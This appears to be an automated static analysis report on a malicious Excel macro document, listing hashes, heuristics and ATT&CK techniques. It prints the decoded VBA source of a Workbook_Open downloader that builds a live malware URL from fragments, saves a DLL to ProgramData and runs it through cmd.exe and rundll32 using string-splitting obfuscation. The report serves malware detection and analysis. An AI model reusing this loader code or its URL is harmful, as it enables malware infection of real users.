Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 d8e69d3403ce1775…

MALICIOUS

Office (OOXML)

62.5 KB Created: 2006-09-28 05:33:49 UTC Authoring application: Microsoft Excel 12.0000 First seen: 2021-10-05
MD5: fbd3a716bf72209a9f087aaf0a9c5b9f SHA-1: 0e9bf449a4add004a3f6b1296fc3e135fd790573 SHA-256: d8e69d3403ce17757ed6148db001ddbf518c67098242622a3b091e766bb73796
Risk score: 100

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The sample is an Excel document containing a Workbook_Open VBA macro, a common technique for executing code automatically when the document is opened. The VBA code is heavily obfuscated but appears to assemble the URL 'https://outdoortacklebox.com/1.dll' from string fragments, likely to download a second-stage payload. It also attempts to write to startup directories, suggesting an attempt at persistence. The combination of a Workbook_Open macro and obfuscated code strongly indicates malicious intent, with spearphishing the likely delivery vector.

Heuristics 3

  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 50656 bytes
SHA-256: 296a3896a5604ce6cc0b0977a6ded255e378bb83b8ab84bb1e0a060eb4896362
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ЭтаКнига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True


Sub chk2wj3k()
   With Application.CommandBars(1).Controls.Add(Type:=msoControlPopup, Temporary:=True)
      .Caption = "?????"
      With .Controls
         With .Add(Type:=msoControlButton)
            .FaceId = 280
            .Caption = "????????"
            .OnAction = "??????1"
         End With
         With .Add(Type:=msoControlPopup)
            .Caption = "???? ??????"
            With .Controls
               With .Add(Type:=msoControlButton)
                  .FaceId = 1643
                  .Caption = "??????????"
                  .OnAction = "??????2"
               End With
               With .Add(Type:=msoControlButton)
                  .FaceId = 1000
                  .Caption = "??????????"
                  .OnAction = "??????3"
               End With
            End With
         End With
      End With
   End With
End Sub





Public Sub nvlk5lk()
    Dim fojn As Long
    
    UserForm1.Label1.Caption = "ht"
    UserForm1.OptionButton1.Caption = UserForm1.Label1.Caption + "tps:/"
    UserForm1.OptionButton2.Caption = UserForm1.OptionButton1.Caption + "/outdo"
    UserForm1.OptionButton2.Tag = UserForm1.OptionButton2.Caption + "ortacklebox.c"
    UserForm1.Label1.Caption = UserForm1.OptionButton2.Tag + "om/1.d"
    UserForm1.Label1.Caption = UserForm1.Label1.Caption + "ll"
    
    UserForm1.OptionButton1.Caption = "C"
    UserForm1.OptionButton2.Caption = UserForm1.OptionButton1.Caption + ":\Pro"
    UserForm1.OptionButton2.Tag = UserForm1.OptionButton2.Caption + "gramD"
    UserForm1.Label1.Tag = UserForm1.OptionButton2.Tag + "ata\ryui2.d"
    UserForm1.OptionButton3.Caption = UserForm1.Label1.Tag + "ll"
    
    fojn = uro2ihol.gfwer23(0, UserForm1.Label1.Caption, UserForm1.OptionButton3.Caption, 0, 0)
    If fojn = 0 Then
        UserForm1.OptionButton3.Caption = "Cxava:xava\Wxavaindoxavaws\xavaSyxavastxavaemxava3xava2\xavacmxavad.exxavae"
        UserForm1.OptionButton3.Caption = uro2ihol.jgflk4(UserForm1.OptionButton3.Caption, "xava")
        UserForm1.OptionButton3.Tag = "/betuc chobetuicbetue /betuC Y /betuN /D Ybetu /T 3betu0 & stabeturt Cbetu:\Wbetuinbetudobetuws\betuSbetuysbetutbetuem3betu2\rbetuundbetullbetu3betu2.betuexbetue Cbetu:\betuProbetugrabetumDbetuatbetua\beturbetutewbetudbetu.dbetull,DbetulbetulRebetugibetustbetuerSbetuerbetuvebetur"
        UserForm1.OptionButton3.Tag = uro2ihol.jgflk4(UserForm1.OptionButton3.Tag, "betu")
        
        uro2ihol.adfeq346w45 UserForm1.OptionButton3.Caption, UserForm1.OptionButton3.Tag
    End If
End Sub



Private Sub Workbook_Open()
    Dim x, y, z As Double
    Dim hnfkj As String
    nvlk5lk
    hnfkj = UserForm1.OptionButton3.Caption
End Sub


Sub sdfml2342pol3(fewo4ih As String, jgdlfk As String)
    fewo4ih = fewo4ih + " "
    fewo4ih = fewo4ih + jgdlfk
    End Sub
   With MenuBars("Worksheet").Menus.Add(Caption:="?????")
      .MenuItems.Add Caption:="????????", OnAction:="??????1"
      With .MenuItems.AddMenu(Caption:="???? ??????")
         .MenuItems.Add Caption:="??????????", OnAction:="??????2"
         .MenuItems.Add Caption:="??????????", OnAction:="??????3"
      End With
   End With
End Sub


Sub ito3uhi4uh()
   With MenuBars("Worksheet").Menus.Add(Caption:="?????")
      .MenuItems.Add Caption:="????????", OnAction:="??????1"
      With .MenuItems.AddMenu(Caption:="???? ??????")
         With .MenuItems.Add(Caption:="??????????")
            .OnAction = "??????2"
         End With
         With .MenuItems.Add(Caption:="??????????")
            .OnAction = "??????3"
         End With
      End With
   End With
End Sub




Attribute VB_Name = "Лист1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_G
... (truncated)
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 147968 bytes
SHA-256: ab1c1f554d29b2fc9cbb0a6677d75d8a9d940aae91d988c19563f01d04149779